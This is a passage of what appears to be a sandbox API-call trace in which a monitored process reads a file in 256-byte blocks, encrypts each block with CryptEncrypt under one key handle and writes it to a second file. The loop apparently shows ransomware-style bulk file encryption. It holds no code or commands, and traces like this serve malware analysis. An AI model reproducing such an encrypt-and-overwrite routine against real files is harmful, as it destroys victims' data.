lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.394] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.394] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.394] GetLastError () returned 0x0 [0165.394] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.394] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.394] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.394] GetLastError () returned 0x0 [0165.394] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.394] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.394] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.394] GetLastError () returned 0x0 [0165.394] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.394] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.394] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.394] GetLastError () returned 0x0 [0165.394] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.394] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.394] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.394] GetLastError () returned 0x0 [0165.394] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.395] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.395] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.395] GetLastError () returned 0x0 [0165.395] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.395] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.395] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.395] GetLastError () returned 0x0 [0165.395] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.395] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.395] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.395] GetLastError () returned 0x0 [0165.395] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.395] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.395] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.395] GetLastError () returned 0x0 [0165.395] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.395] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.395] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.395] GetLastError () returned 0x0 [0165.395] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.395] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.395] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.395] GetLastError () returned 0x0 [0165.395] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.395] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.395] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.396] GetLastError () returned 0x0 [0165.396] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.396] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.396] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.396] GetLastError () returned 0x0 [0165.396] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.396] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.396] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.396] GetLastError () returned 0x0 [0165.396] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.396] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.396] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.396] GetLastError () returned 0x0 [0165.396] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.396] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.396] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.396] GetLastError () returned 0x0 [0165.396] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.396] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.396] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.396] GetLastError () returned 0x0 [0165.396] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.396] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.396] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.396] GetLastError () returned 0x0 [0165.396] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.396] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.397] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.397] GetLastError () returned 0x0 [0165.397] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.397] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.397] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.397] GetLastError () returned 0x0 [0165.397] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.397] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.397] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.397] GetLastError () returned 0x0 [0165.397] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.397] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.397] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.397] GetLastError () returned 0x0 [0165.397] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.397] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.397] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.397] GetLastError () returned 0x0 [0165.397] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.397] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.397] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.397] GetLastError () returned 0x0 [0165.397] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.398] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.398] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.398] GetLastError () returned 0x0 [0165.398] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.398] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.398] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.398] GetLastError () returned 0x0 [0165.398] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.398] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.398] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.398] GetLastError () returned 0x0 [0165.398] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.398] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.398] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.398] GetLastError () returned 0x0 [0165.398] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.398] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.398] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.398] GetLastError () returned 0x0 [0165.398] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.398] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.398] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.398] GetLastError () returned 0x0 [0165.398] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.398] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.399] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.399] GetLastError () returned 0x0 [0165.399] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.399] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.399] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.399] GetLastError () returned 0x0 [0165.399] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: 